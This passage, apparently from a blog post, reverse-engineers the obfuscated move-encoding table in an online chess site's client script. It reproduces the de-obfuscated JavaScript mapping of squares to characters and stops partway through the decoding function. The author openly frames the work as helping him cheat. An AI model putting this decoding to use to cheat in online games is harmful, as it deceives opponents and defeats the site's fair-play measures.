know why the chose it, maybe it's represents a compression because it'd
use n/2 of the space where n is the number of bytes used in the
<a href="http://en.wikipedia.org/wiki/Algebraic_notation_(chess)">algebraic chess
notation.</a>.</p>
<p>But I honestly doubt it, because there are far better compression
methods for 64 possible squares (and some promotion combinations).</p>
<p>Maybe it's a way to stop stupid cheaters like me to pursue their
devilish deeds, but that can't be possible, since the method that
decoded/decrypts the move notation isn't more than a simple look-up
table:</p>
<p>Here is the relevant code part of the obfuscated javascript source in
LiveChessCore.js, at line 8577 (after applying Chrome's pretty print
functionality):</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="n">function</span><span class="p">()</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">zf9bd6</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">function</span><span class="p">()</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z6439d</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="s">"a1"</span><span class="o">:</span><span class="w"> </span><span class="s">"a"</span><span class="p">,</span><span class="s">"a2"</span><span class="o">:</span><span class="w"> </span><span class="s">"i"</span><span class="p">,</span><span class="s">"a3"</span><span class="o">:</span><span class="w"> </span><span class="s">"q"</span><span class="p">,</span><span class="s">"a4"</span><span class="o">:</span><span class="w"> </span><span class="s">"y"</span><span class="p">,</span><span class="s">"a5"</span><span class="o">:</span><span class="w"> </span><span class="s">"G"</span><span class="p">,</span><span class="s">"a6"</span><span class="o">:</span><span class="w"> </span><span class="s">"O"</span><span class="p">,</span><span class="s">"a7"</span><span class="o">:</span><span class="w"> </span><span class="s">"W"</span><span class="p">,</span><span class="s">"a8"</span><span class="o">:</span><span class="w"> </span><span class="s">"4"</span><span class="p">,</span><span class="s">"b1"</span><span class="o">:</span><span class="w"> </span><span class="s">"b"</span><span class="p">,</span><span class="s">"b2"</span><span class="o">:</span><span class="w"> </span><span class="s">"j"</span><span class="p">,</span><span class="s">"b3"</span><span class="o">:</span><span class="w"> </span><span class="s">"r"</span><span class="p">,</span><span class="s">"b4"</span><span class="o">:</span><span class="w"> </span><span class="s">"z"</span><span class="p">,</span><span class="s">"b5"</span><span class="o">:</span><span class="w"> </span><span class="s">"H"</span><span class="p">,</span><span class="s">"b6"</span><span class="o">:</span><span class="w"> </span><span class="s">"P"</span><span class="p">,</span><span class="s">"b7"</span><span class="o">:</span><span class="w"> </span><span class="s">"X"</span><span class="p">,</span><span class="s">"b8"</span><span class="o">:</span><span class="w"> </span><span class="s">"5"</span><span class="p">,</span><span class="s">"c1"</span><span class="o">:</span><span class="w"> </span><span class="s">"c"</span><span class="p">,</span><span class="s">"c2"</span><span class="o">:</span><span class="w"> </span><span class="s">"k"</span><span class="p">,</span><span class="s">"c3"</span><span class="o">:</span><span class="w"> </span><span class="s">"s"</span><span class="p">,</span><span class="s">"c4"</span><span class="o">:</span><span class="w"> </span><span class="s">"A"</span><span class="p">,</span><span class="s">"c5"</span><span class="o">:</span><span class="w"> </span><span class="s">"I"</span><span class="p">,</span><span class="s">"c6"</span><span class="o">:</span><span class="w"> </span><span class="s">"Q"</span><span class="p">,</span><span class="s">"c7"</span><span class="o">:</span><span class="w"> </span><span class="s">"Y"</span><span class="p">,</span><span class="s">"c8"</span><span class="o">:</span><span class="w"> </span><span class="s">"6"</span><span class="p">,</span><span class="s">"d1"</span><span class="o">:</span><span class="w"> </span><span class="s">"d"</span><span class="p">,</span><span class="s">"d2"</span><span class="o">:</span><span class="w"> </span><span class="s">"l"</span><span class="p">,</span><span class="s">"d3"</span><span class="o">:</span><span class="w"> </span><span class="s">"t"</span><span class="p">,</span><span class="s">"d4"</span><span class="o">:</span><span class="w"> </span><span class="s">"B"</span><span class="p">,</span><span class="s">"d5"</span><span class="o">:</span><span class="w"> </span><span class="s">"J"</span><span class="p">,</span><span class="s">"d6"</span><span class="o">:</span><span class="w"> </span><span class="s">"R"</span><span class="p">,</span><span class="s">"d7"</span><span class="o">:</span><span class="w"> </span><span class="s">"Z"</span><span class="p">,</span><span class="s">"d8"</span><span class="o">:</span><span class="w"> </span><span class="s">"7"</span><span class="p">,</span><span class="s">"e1"</span><span class="o">:</span><span class="w"> </span><span class="s">"e"</span><span class="p">,</span><span class="s">"e2"</span><span class="o">:</span><span class="w"> </span><span class="s">"m"</span><span class="p">,</span><span class="s">"e3"</span><span class="o">:</span><span class="w"> </span><span class="s">"u"</span><span class="p">,</span><span class="s">"e4"</span><span class="o">:</span><span class="w"> </span><span class="s">"C"</span><span class="p">,</span><span class="s">"e5"</span><span class="o">:</span><span class="w"> </span><span class="s">"K"</span><span class="p">,</span><span class="s">"e6"</span><span class="o">:</span><span class="w"> </span><span class="s">"S"</span><span class="p">,</span><span class="s">"e7"</span><span class="o">:</span><span class="w"> </span><span class="s">"0"</span><span class="p">,</span><span class="s">"e8"</span><span class="o">:</span><span class="w"> </span><span class="s">"8"</span><span class="p">,</span><span class="s">"f1"</span><span class="o">:</span><span class="w"> </span><span class="s">"f"</span><span class="p">,</span><span class="s">"f2"</span><span class="o">:</span><span class="w"> </span><span class="s">"n"</span><span class="p">,</span><span class="s">"f3"</span><span class="o">:</span><span class="w"> </span><span class="s">"v"</span><span class="p">,</span><span class="s">"f4"</span><span class="o">:</span><span class="w"> </span><span class="s">"D"</span><span class="p">,</span><span class="s">"f5"</span><span class="o">:</span><span class="w"> </span><span class="s">"L"</span><span class="p">,</span><span class="s">"f6"</span><span class="o">:</span><span class="w"> </span><span class="s">"T"</span><span class="p">,</span><span class="s">"f7"</span><span class="o">:</span><span class="w"> </span><span class="s">"1"</span><span class="p">,</span><span class="s">"f8"</span><span class="o">:</span><span class="w"> </span><span class="s">"9"</span><span class="p">,</span><span class="s">"g1"</span><span class="o">:</span><span class="w"> </span><span class="s">"g"</span><span class="p">,</span><span class="s">"g2"</span><span class="o">:</span><span class="w"> </span><span class="s">"o"</span><span class="p">,</span><span class="s">"g3"</span><span class="o">:</span><span class="w"> </span><span class="s">"w"</span><span class="p">,</span><span class="s">"g4"</span><span class="o">:</span><span class="w"> </span><span class="s">"E"</span><span class="p">,</span><span class="s">"g5"</span><span class="o">:</span><span class="w"> </span><span class="s">"M"</span><span class="p">,</span><span class="s">"g6"</span><span class="o">:</span><span class="w"> </span><span class="s">"U"</span><span class="p">,</span><span class="s">"g7"</span><span class="o">:</span><span class="w"> </span><span class="s">"2"</span><span class="p">,</span><span class="s">"g8"</span><span class="o">:</span><span class="w"> </span><span class="s">"!"</span><span class="p">,</span><span class="s">"h1"</span><span class="o">:</span><span class="w"> </span><span class="s">"h"</span><span class="p">,</span><span class="s">"h2"</span><span class="o">:</span><span class="w"> </span><span class="s">"p"</span><span class="p">,</span><span class="s">"h3"</span><span class="o">:</span><span class="w"> </span><span class="s">"x"</span><span class="p">,</span><span class="s">"h4"</span><span class="o">:</span><span class="w"> </span><span class="s">"F"</span><span class="p">,</span><span class="s">"h5"</span><span class="o">:</span><span class="w"> </span><span class="s">"N"</span><span class="p">,</span><span class="s">"h6"</span><span class="o">:</span><span class="w"> </span><span class="s">"V"</span><span class="p">,</span><span class="s">"h7"</span><span class="o">:</span><span class="w"> </span><span class="s">"3"</span><span class="p">,</span><span class="s">"h8"</span><span class="o">:</span><span class="w"> </span><span class="s">"?"</span><span class="p">};</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze8500</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="s">"_a"</span><span class="o">:</span><span class="w"> </span><span class="s">"a1"</span><span class="p">,</span><span class="s">"_i"</span><span class="o">:</span><span class="w"> </span><span class="s">"a2"</span><span class="p">,</span><span class="s">"_q"</span><span class="o">:</span><span class="w"> </span><span class="s">"a3"</span><span class="p">,</span><span class="s">"_y"</span><span class="o">:</span><span class="w"> </span><span class="s">"a4"</span><span class="p">,</span><span class="s">"_G"</span><span class="o">:</span><span class="w"> </span><span class="s">"a5"</span><span class="p">,</span><span class="s">"_O"</span><span class="o">:</span><span class="w"> </span><span class="s">"a6"</span><span class="p">,</span><span class="s">"_W"</span><span class="o">:</span><span class="w"> </span><span class="s">"a7"</span><span class="p">,</span><span class="s">"_4"</span><span class="o">:</span><span class="w"> </span><span class="s">"a8"</span><span class="p">,</span><span class="s">"_b"</span><span class="o">:</span><span class="w"> </span><span class="s">"b1"</span><span class="p">,</span><span class="s">"_j"</span><span class="o">:</span><span class="w"> </span><span class="s">"b2"</span><span class="p">,</span><span class="s">"_r"</span><span class="o">:</span><span class="w"> </span><span class="s">"b3"</span><span class="p">,</span><span class="s">"_z"</span><span class="o">:</span><span class="w"> </span><span class="s">"b4"</span><span class="p">,</span><span class="s">"_H"</span><span class="o">:</span><span class="w"> </span><span class="s">"b5"</span><span class="p">,</span><span class="s">"_P"</span><span class="o">:</span><span class="w"> </span><span class="s">"b6"</span><span class="p">,</span><span class="s">"_X"</span><span class="o">:</span><span class="w"> </span><span class="s">"b7"</span><span class="p">,</span><span class="s">"_5"</span><span class="o">:</span><span class="w"> </span><span class="s">"b8"</span><span class="p">,</span><span class="s">"_c"</span><span class="o">:</span><span class="w"> </span><span class="s">"c1"</span><span class="p">,</span><span class="s">"_k"</span><span class="o">:</span><span class="w"> </span><span class="s">"c2"</span><span class="p">,</span><span class="s">"_s"</span><span class="o">:</span><span class="w"> </span><span class="s">"c3"</span><span class="p">,</span><span class="s">"_A"</span><span class="o">:</span><span class="w"> </span><span class="s">"c4"</span><span class="p">,</span><span class="s">"_I"</span><span class="o">:</span><span class="w"> </span><span class="s">"c5"</span><span class="p">,</span><span class="s">"_Q"</span><span class="o">:</span><span class="w"> </span><span class="s">"c6"</span><span class="p">,</span><span class="s">"_Y"</span><span class="o">:</span><span class="w"> </span><span class="s">"c7"</span><span class="p">,</span><span class="s">"_6"</span><span class="o">:</span><span class="w"> </span><span class="s">"c8"</span><span class="p">,</span><span class="s">"_d"</span><span class="o">:</span><span class="w"> </span><span class="s">"d1"</span><span class="p">,</span><span class="s">"_l"</span><span class="o">:</span><span class="w"> </span><span class="s">"d2"</span><span class="p">,</span><span class="s">"_t"</span><span class="o">:</span><span class="w"> </span><span class="s">"d3"</span><span class="p">,</span><span class="s">"_B"</span><span class="o">:</span><span class="w"> </span><span class="s">"d4"</span><span class="p">,</span><span class="s">"_J"</span><span class="o">:</span><span class="w"> </span><span class="s">"d5"</span><span class="p">,</span><span class="s">"_R"</span><span class="o">:</span><span class="w"> </span><span class="s">"d6"</span><span class="p">,</span><span class="s">"_Z"</span><span class="o">:</span><span class="w"> </span><span class="s">"d7"</span><span class="p">,</span><span class="s">"_7"</span><span class="o">:</span><span class="w"> </span><span class="s">"d8"</span><span class="p">,</span><span class="s">"_e"</span><span class="o">:</span><span class="w"> </span><span class="s">"e1"</span><span class="p">,</span><span class="s">"_m"</span><span class="o">:</span><span class="w"> </span><span class="s">"e2"</span><span class="p">,</span><span class="s">"_u"</span><span class="o">:</span><span class="w"> </span><span class="s">"e3"</span><span class="p">,</span><span class="s">"_C"</span><span class="o">:</span><span class="w"> </span><span class="s">"e4"</span><span class="p">,</span><span class="s">"_K"</span><span class="o">:</span><span class="w"> </span><span class="s">"e5"</span><span class="p">,</span><span class="s">"_S"</span><span class="o">:</span><span class="w"> </span><span class="s">"e6"</span><span class="p">,</span><span class="s">"_0"</span><span class="o">:</span><span class="w"> </span><span class="s">"e7"</span><span class="p">,</span><span class="s">"_8"</span><span class="o">:</span><span class="w"> </span><span class="s">"e8"</span><span class="p">,</span><span class="s">"_f"</span><span class="o">:</span><span class="w"> </span><span class="s">"f1"</span><span class="p">,</span><span class="s">"_n"</span><span class="o">:</span><span class="w"> </span><span class="s">"f2"</span><span class="p">,</span><span class="s">"_v"</span><span class="o">:</span><span class="w"> </span><span class="s">"f3"</span><span class="p">,</span><span class="s">"_D"</span><span class="o">:</span><span class="w"> </span><span class="s">"f4"</span><span class="p">,</span><span class="s">"_L"</span><span class="o">:</span><span class="w"> </span><span class="s">"f5"</span><span class="p">,</span><span class="s">"_T"</span><span class="o">:</span><span class="w"> </span><span class="s">"f6"</span><span class="p">,</span><span class="s">"_1"</span><span class="o">:</span><span class="w"> </span><span class="s">"f7"</span><span class="p">,</span><span class="s">"_9"</span><span class="o">:</span><span class="w"> </span><span class="s">"f8"</span><span class="p">,</span><span class="s">"_g"</span><span class="o">:</span><span class="w"> </span><span class="s">"g1"</span><span class="p">,</span><span class="s">"_o"</span><span class="o">:</span><span class="w"> </span><span class="s">"g2"</span><span class="p">,</span><span class="s">"_w"</span><span class="o">:</span><span class="w"> </span><span class="s">"g3"</span><span class="p">,</span><span class="s">"_E"</span><span class="o">:</span><span class="w"> </span><span class="s">"g4"</span><span class="p">,</span><span class="s">"_M"</span><span class="o">:</span><span class="w"> </span><span class="s">"g5"</span><span class="p">,</span><span class="s">"_U"</span><span class="o">:</span><span class="w"> </span><span class="s">"g6"</span><span class="p">,</span><span class="s">"_2"</span><span class="o">:</span><span class="w"> </span><span class="s">"g7"</span><span class="p">,</span><span class="s">"_!"</span><span class="o">:</span><span class="w"> </span><span class="s">"g8"</span><span class="p">,</span><span class="s">"_h"</span><span class="o">:</span><span class="w"> </span><span class="s">"h1"</span><span class="p">,</span><span class="s">"_p"</span><span class="o">:</span><span class="w"> </span><span class="s">"h2"</span><span class="p">,</span><span class="s">"_x"</span><span class="o">:</span><span class="w"> </span><span class="s">"h3"</span><span class="p">,</span><span class="s">"_F"</span><span class="o">:</span><span class="w"> </span><span class="s">"h4"</span><span class="p">,</span><span class="s">"_N"</span><span class="o">:</span><span class="w"> </span><span class="s">"h5"</span><span class="p">,</span><span class="s">"_V"</span><span class="o">:</span><span class="w"> </span><span class="s">"h6"</span><span class="p">,</span><span class="s">"_3"</span><span class="o">:</span><span class="w"> </span><span class="s">"h7"</span><span class="p">,</span><span class="s">"_?"</span><span class="o">:</span><span class="w"> </span><span class="s">"h8"</span><span class="p">};</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z56f6c</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"{"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z87e36</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"~"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zbba2c</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"}"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z7fd23</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"("</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">za93ff</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"^"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z536e1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">")"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z817b2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"["</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z00e3d</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"_"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze4b5e</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"]"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z91a79</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"@"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zc21d8</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"#"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zaa236</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"$"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">};</span><span class="w"></span>
<span class="w"> </span><span class="n">zf9bd6</span><span class="p">.</span><span class="n">prototype</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="n">z0cd66</span><span class="o">:</span><span class="w"> </span><span class="n">function</span><span class="p">(</span><span class="n">ze2e37</span><span class="p">,</span><span class="w"> </span><span class="n">zbd29b</span><span class="p">,</span><span class="w"> </span><span class="n">z2ba00</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">zed3d4</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z6439d</span><span class="p">[</span><span class="n">ze2e37</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">z98075</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z6439d</span><span class="p">[</span><span class="n">zbd29b</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z2ba00</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">dir</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">zbd29b</span><span class="p">.</span><span class="n">charCodeAt</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">ze2e37</span><span class="p">.</span><span class="n">charCodeAt</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z2ba00</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"q"</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">z98075</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z56f6c</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="p">((</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zbba2c</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z87e36</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z2ba00</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"n"</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">z98075</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z7fd23</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="p">((</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z536e1</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">za93ff</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z2ba00</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"r"</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">z98075</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z817b2</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="p">((</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze4b5e</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z00e3d</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z2ba00</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"b"</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">z98075</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z91a79</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="p">((</span><span class="n">dir</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zaa236</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zc21d8</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">zed3d4</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">z98075</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="n">zafc74</span><span class="o">:</span><span class="w"> </span><span class="n">function</span><span class="p">(</span><span class="n">z32182</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">zed3d4</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z32182</span><span class="p">.</span><span class="n">charAt</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">z98075</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z32182</span><span class="p">.</span><span class="n">charAt</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">ze2e37</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze8500</span><span class="p">[</span><span class="s">"_"</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">zed3d4</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">zbd29b</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">null</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ze2e37</span><span class="p">.</span><span class="n">charCodeAt</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">null</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z56f6c</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"q"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z87e36</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"q"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zbba2c</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"q"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z7fd23</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"n"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">za93ff</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"n"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z536e1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"n"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z817b2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"r"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
